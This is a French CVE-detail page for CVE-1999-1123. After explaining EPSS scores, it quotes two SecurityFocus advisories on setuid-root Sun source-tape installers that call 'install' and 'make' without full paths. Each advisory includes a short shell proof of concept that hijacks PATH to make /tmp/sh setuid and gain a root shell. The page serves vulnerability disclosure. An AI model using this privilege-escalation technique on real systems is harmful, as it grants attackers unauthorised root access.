CVE-1999-1123 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/22/info This applies to sites that have installed Sun Source tapes only. The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable. This makes it possible for users on that system to become root. $ cp /bin/sh /tmp/sh $ echo chmod 4777 /tmp/sh > /tmp/install $ chmod a+rx /tmp/install $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/winstall $ /tmp/sh #

source: https://www.securityfocus.com/bid/21/info This applies to sites that have installed Sun Source tapes only. The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable. This makes it possible for users on that system to become root. $ cp /bin/sh /tmp/sh $ echo chmod 4777 /tmp/sh > /tmp/make $ chmod a+rx /tmp/make $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/makeinstall $ /tmp/sh #